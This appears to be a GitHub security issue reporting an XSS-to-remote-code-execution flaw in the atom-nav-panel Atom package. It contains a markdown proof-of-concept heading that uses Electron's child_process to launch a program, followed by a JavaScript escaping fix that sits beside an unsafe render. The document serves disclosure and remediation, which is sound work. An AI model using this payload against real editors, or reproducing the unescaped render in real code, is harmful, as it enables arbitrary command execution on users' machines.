forked from Ziink/atom-nav-panel
[Security] XSS RCE #31 (Open)

Description
The current implementation allows for XSS in the title fields.
XSS in Electron allows interaction with the system API and execution of applications or commands.
Markdown POC:
# sometitle <script type="text/javascript">window.top.require('child_process').execFile('/usr/bin/gnome-calculator',function(){});</script>
Fix:
Encode output before it is rendered in the UI.
OWASP XSS Prevention Cheat Sheet
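A worked example of the suggested fix, added here as an illustration and not code from the atom-nav-panel project: a minimal HTML escaper applied at the point where a heading's text is turned into markup, with the unsafe string-concatenation render placed beside the escaped one. The names (escapeHtml, headingText, renderNavItem, renderNav), the CSS class and the sample heading line are constructed for this example.

```javascript
// Added example, not atom-nav-panel's own code: escape untrusted heading text
// before it is placed into HTML, following rule #1 of the OWASP XSS Prevention
// Cheat Sheet (HTML entity-encode the characters that can change HTML context).

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Entity-encode the five significant characters. For text placed inside an
// element body this is sufficient; attribute and URL contexts need more.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Parse an ATX markdown heading line ("## Title") into its level and raw text.
// Returns null for non-heading lines. The returned text is still untrusted.
function headingText(line) {
  const m = /^(#{1,6})[ \t]+(.*?)[ \t#]*$/.exec(line);
  if (!m) return null;
  return { level: m[1].length, text: m[2] };
}

// Vulnerable pattern: untrusted text concatenated straight into HTML that will
// later be assigned to innerHTML. A <script> in the title survives intact.
function renderNavItemUnsafe(heading) {
  return `<li class="nav-level-${heading.level}">${heading.text}</li>`;
}

// Fixed pattern: identical markup, but the text is escaped at the sink.
function renderNavItem(heading) {
  return `<li class="nav-level-${heading.level}">${escapeHtml(heading.text)}</li>`;
}

// Render every heading of a markdown document into nav items (escaped form).
function renderNav(markdown) {
  return markdown
    .split('\n')
    .map(headingText)
    .filter(Boolean)
    .map(renderNavItem)
    .join('\n');
}

// Constructed sample: a heading whose title carries a script tag.
const SAMPLE_LINE = '# sometitle <script>alert(1)</script>';

console.log('unsafe:', renderNavItemUnsafe(headingText(SAMPLE_LINE)));
console.log('fixed: ', renderNavItem(headingText(SAMPLE_LINE)));
```

In an Atom or Electron renderer, building the element with DOM APIs (`document.createElement` plus `el.textContent = title`) avoids the escaping step entirely; escaping as above is the fallback when an HTML string has to be assembled. Because the Atom renderer exposes `require` to page script, any script that does slip through runs with the full privileges of the editor process, which is why output encoding at every sink matters more here than in an ordinary browser page.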